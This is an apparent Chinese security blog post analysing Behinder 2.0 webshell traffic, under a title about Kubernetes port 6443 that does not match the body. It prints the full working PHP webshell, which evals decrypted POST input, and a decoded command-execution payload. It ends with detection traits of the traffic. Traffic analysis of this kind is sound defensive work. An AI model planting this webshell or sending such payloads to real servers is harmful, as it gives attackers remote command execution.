K8S 6443未授权访问

冰蝎为一款主流Webshell管理工具，本篇分析Benhinder2.0中php shell流量。

Github:https://github.com/rebeyond/Behinder/releases/tag/Behinder_v2.0

测试环境：

Win7
PhpStudy
Behinder2.0

为了方便测试，php需开启openssl插件。

Behinder内置Webshell，在server目录下

shell.php内容如下：

?>
<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
}

代码中我们可以看出，若开启了openssl，则会采用AES128->base64进行解密，若未开启openssl，则会使用base64->异或进行解密。

将/server/shell.php放置在phpstudy网站目录中，使用Behinder2.0进行连接，默认密码为pass

成功连接

流量解密

这里为了直观我将流量代理至burp进行分析

再次打开webshell，burp中发现以下流量包

Behinder前两次会进行密钥的获取和更新，我们需要获取第二次的密钥，也就是这里的7e42737bc70ea538，第三个包会确定content参数的值，第四个包会获取phpinfo系信息（这几步你可以看完下面的解密方式之后再回过头来看到底做了什么）

获取到了之后，由于Behinder2.0流量传输是使用的AES加密，我们可以获取秘钥之后可以进行解密
AES解密：http://tools.bugscaner.com/cryptoaes/
Base64解密：https://tool.oschina.net/encrypt?type=3

这里在Behinder中通过cmd查询当前用户

POST请求数据如下：

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

使用之前获取的秘钥进行解密：

AES解密之后将base64_decode中的内容进行base64解密能还原出请求的php代码

QGVycm9yX3JlcG9ydGluZygwKTsNCg0KZnVuY3Rpb24gZ2V0U2FmZVN0cigkc3RyKXsNCiAgICAkczEgPSBpY29udigndXRmLTgnLCdnYmsvL0lHTk9SRScsJHN0cik7DQogICAgJHMwID0gaWNvbnYoJ2diaycsJ3V0Zi04Ly9JR05PUkUnLCRzMSk7DQogICAgaWYoJHMwID09ICRzdHIpew0KICAgICAgICByZXR1cm4gJHMwOw0KICAgIH1lbHNlew0KICAgICAgICByZXR1cm4gaWNvbnYoJ2diaycsJ3V0Zi04Ly9JR05PUkUnLCRzdHIpOw0KICAgIH0NCn0NCmZ1bmN0aW9uIG1haW4oJGNtZCkNCnsNCiAgICBAc2V0X3RpbWVfbGltaXQoMCk7DQogICAgQGlnbm9yZV91c2VyX2Fib3J0KDEpOw0KICAgIEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLCAwKTsNCiAgICAkcmVzdWx0ID0gYXJyYXkoKTsNCiAgICAkUGFkdEpuID0gQGluaV9nZXQoJ2Rpc2FibGVfZnVuY3Rpb25zJyk7DQogICAgaWYgKCEgZW1wdHkoJFBhZHRKbikpIHsNCiAgICAgICAgJFBhZHRKbiA9IHByZWdfcmVwbGFjZSgnL1ssIF0rLycsICcsJywgJFBhZHRKbik7DQogICAgICAgICRQYWR0Sm4gPSBleHBsb2RlKCcsJywgJFBhZHRKbik7DQogICAgICAgICRQYWR0Sm4gPSBhcnJheV9tYXAoJ3RyaW0nLCAkUGFkdEpuKTsNCiAgICB9IGVsc2Ugew0KICAgICAgICAkUGFkdEpuID0gYXJyYXkoKTsNCiAgICB9DQogICAgJGMgPSAkY21kOw0KICAgIGlmIChGQUxTRSAhPT0gc3RycG9zKHN0cnRvbG93ZXIoUEhQX09TKSwgJ3dpbicpKSB7DQogICAgICAgICRjID0gJGMgLiAiIDI+JjFcbiI7DQogICAgfQ0KICAgICRKdWVRREJIID0gJ2lzX2NhbGxhYmxlJzsNCiAgICAkQnZjZSA9ICdpbl9hcnJheSc7DQogICAgaWYgKCRKdWVRREJIKCdzeXN0ZW0nKSBhbmQgISAkQnZjZSgnc3lzdGVtJywgJFBhZHRKbikpIHsNCiAgICAgICAgb2Jfc3RhcnQoKTsNCiAgICAgICAgc3lzdGVtKCRjKTsNCiAgICAgICAgJGtXSlcgPSBvYl9nZXRfY29udGVudHMoKTsNCiAgICAgICAgb2JfZW5kX2NsZWFuKCk7DQogICAgfSBlbHNlIGlmICgkSnVlUURCSCgncHJvY19vcGVuJykgYW5kICEgJEJ2Y2UoJ3Byb2Nfb3BlbicsICRQYWR0Sm4pKSB7DQogICAgICAgICRoYW5kbGUgPSBwcm9jX29wZW4oJGMsIGFycmF5KA0KICAgICAgICAgICAgYXJyYXkoDQogICAgICAgICAgICAgICAgJ3BpcGUnLA0KICAgICAgICAgICAgICAgICdyJw0KICAgICAgICAgICAgKSwNCiAgICAgICAgICAgIGFycmF5KA0KICAgICAgICAgICAgICAgICdwaXBlJywNCiAgICAgICAgICAgICAgICAndycNCiAgICAgICAgICAgICksDQogICAgICAgICAgICBhcnJheSgNCiAgICAgICAgICAgICAgICAncGlwZScsDQogICAgICAgICAgICAgICAgJ3cnDQogICAgICAgICAgICApDQogICAgICAgICksICRwaXBlcyk7DQogICAgICAgICRrV0pXID0gTlVMTDsNCiAgICAgICAgd2hpbGUgKCEgZmVvZigkcGlwZXNbMV0pKSB7DQogICAgICAgICAgICAka1dKVyAuPSBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KICAgICAgICB9DQogICAgICAgIEBwcm9jX2Nsb3NlKCRoYW5kbGUpOw0KICAgIH0gZWxzZSBpZiAoJEp1ZVFEQkgoJ3Bhc3N0aHJ1JykgYW5kICEgJEJ2Y2UoJ3Bhc3N0aHJ1JywgJFBhZHRKbikpIHsNCiAgICAgICAgb2Jfc3RhcnQoKTsNCiAgICAgICAgcGFzc3RocnUoJGMpOw0KICAgICAgICAka1dKVyA9IG9iX2dldF9jb250ZW50cygpOw0KICAgICAgICBvYl9lbmRfY2xlYW4oKTsNCiAgICB9IGVsc2UgaWYgKCRKdWVRREJIKCdzaGVsbF9leGVjJykgYW5kICEgJEJ2Y2UoJ3NoZWxsX2V4ZWMnLCAkUGFkdEpuKSkgew0KICAgICAgICAka1dKVyA9IHNoZWxsX2V4ZWMoJGMpOw0KICAgIH0gZWxzZSBpZiAoJEp1ZVFEQkgoJ2V4ZWMnKSBhbmQgISAkQnZjZSgnZXhlYycsICRQYWR0Sm4pKSB7DQogICAgICAgICRrV0pXID0gYXJyYXkoKTsNCiAgICAgICAgZXhlYygkYywgJGtXSlcpOw0KICAgICAgICAka1dKVyA9IGpvaW4oY2hyKDEwKSwgJGtXSlcpIC4gY2hyKDEwKTsNCiAgICB9IGVsc2UgaWYgKCRKdWVRREJIKCdleGVjJykgYW5kICEgJEJ2Y2UoJ3BvcGVuJywgJFBhZHRKbikpIHsNCiAgICAgICAgJGZwID0gcG9wZW4oJGMsICdyJyk7DQogICAgICAgICRrV0pXID0gTlVMTDsNCiAgICAgICAgaWYgKGlzX3Jlc291cmNlKCRmcCkpIHsNCiAgICAgICAgICAgIHdoaWxlICghIGZlb2YoJGZwKSkgew0KICAgICAgICAgICAgICAgICRrV0pXIC49IGZyZWFkKCRmcCwgMTAyNCk7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAgQHBjbG9zZSgkZnApOw0KICAgIH0gZWxzZSB7DQogICAgICAgICRrV0pXID0gMDsNCiAgICAgICAgJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJmYWlsIik7DQogICAgICAgICRyZXN1bHRbIm1zZyJdID0gYmFzZTY0X2VuY29kZSgibm9uZSBvZiBwcm9jX29wZW4vcGFzc3RocnUvc2hlbGxfZXhlYy9leGVjL2V4ZWMgaXMgYXZhaWxhYmxlIik7DQogICAgICAgICRrZXkgPSAkX1NFU1NJT05bJ2snXTsNCiAgICAgICAgZWNobyBlbmNyeXB0KGpzb25fZW5jb2RlKCRyZXN1bHQpLCAka2V5KTsNCiAgICAgICAgcmV0dXJuOw0KICAgICAgICANCiAgICB9DQogICAgJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJzdWNjZXNzIik7DQogICAgJHJlc3VsdFsibXNnIl0gPSBiYXNlNjRfZW5jb2RlKGdldFNhZmVTdHIoJGtXSlcpKTsNCiAgICBlY2hvIGVuY3J5cHQoanNvbl9lbmNvZGUoJHJlc3VsdCksICAkX1NFU1NJT05bJ2snXSk7DQp9DQoNCmZ1bmN0aW9uIGVuY3J5cHQoJGRhdGEsJGtleSkNCnsNCglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQ0KICAgIAl7DQogICAgCQlmb3IoJGk9MDskaTxzdHJsZW4oJGRhdGEpOyRpKyspIHsNCiAgICAJCQkgJGRhdGFbJGldID0gJGRhdGFbJGldXiRrZXlbJGkrMSYxNV07IA0KICAgIAkJCX0NCgkJCXJldHVybiAkZGF0YTsNCiAgICAJfQ0KICAgIGVsc2UNCiAgICAJew0KICAgIAkJcmV0dXJuIG9wZW5zc2xfZW5jcnlwdCgkZGF0YSwgIkFFUzEyOCIsICRrZXkpOw0KICAgIAl9DQp9JGNtZD0id2hvYW1pIjsNCm1haW4oJGNtZCk7

@error_reporting(0);

function getSafeStr($str){
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
    $s0 = iconv('gbk','utf-8//IGNORE',$s1);
    if($s0 == $str){
        return $s0;
    }else{
        return iconv('gbk','utf-8//IGNORE',$str);
    }
}
function main($cmd)
{
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set('max_execution_time', 0);
    $result = array();
    $PadtJn = @ini_get('disable_functions');
    if (! empty($PadtJn)) {
        $PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);
        $PadtJn = explode(',', $PadtJn);
        $PadtJn = array_map('trim', $PadtJn);
    } else {
        $PadtJn = array();
    }
    $c = $cmd;
    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {
        $c = $c . " 2>&1\n";
    }
    $JueQDBH = 'is_callable';
    $Bvce = 'in_array';
    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {
        ob_start();
        system($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {
        $handle = proc_open($c, array(
            array(
                'pipe',
                'r'
            ),
            array(
                'pipe',
                'w'
            ),
            array(
                'pipe',
                'w'
            )
        ), $pipes);
        $kWJW = NULL;
        while (! feof($pipes[1])) {
            $kWJW .= fread($pipes[1], 1024);
        }
        @proc_close($handle);
    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {
        ob_start();
        passthru($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {
        $kWJW = shell_exec($c);
    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {
        $kWJW = array();
        exec($c, $kWJW);
        $kWJW = join(chr(10), $kWJW) . chr(10);
    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {
        $fp = popen($c, 'r');
        $kWJW = NULL;
        if (is_resource($fp)) {
            while (! feof($fp)) {
                $kWJW .= fread($fp, 1024);
            }
        }
        @pclose($fp);
    } else {
        $kWJW = 0;
        $result["status"] = base64_encode("fail");
        $result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");
        $key = $_SESSION['k'];
        echo encrypt(json_encode($result), $key);
        return;
        
    }
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode(getSafeStr($kWJW));
    echo encrypt(json_encode($result),  $_SESSION['k']);
}

function encrypt($data,$key)
{
	if(!extension_loaded('openssl'))
    	{
    		for($i=0;$i<strlen($data);$i++) {
    			 $data[$i] = $data[$i]^$key[$i+1&15]; 
    			}
			return $data;
    	}
    else
    	{
    		return openssl_encrypt($data, "AES128", $key);
    	}
}$cmd="whoami";
main($cmd);

可以在最后几行看出执行了系统命令

同样我们可以通过AES->base64解密返回包看到返回的结果

原始返回数据：
WR+Yx9S+tk8IDtZhi4EN45n/tBuHL/twS/lcdbMjmCGgZVd7h6Y8g1a97iLoDycgePW1rFM0ijMlPpi2kBxu6w==
AES解密后数据：
{"status":"c3VjY2Vzcw==","msg":"c3dhZzctcGNcc3dhZzcNCg=="}
base64解密后的msg：
swag7-pc\swag7

同理，我们可以分析出Behinder其他功能实现的相关代码。

流量特征

1.十六位秘钥
2.Get请求pass参数

---

转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 sher10cksec@foxmail.com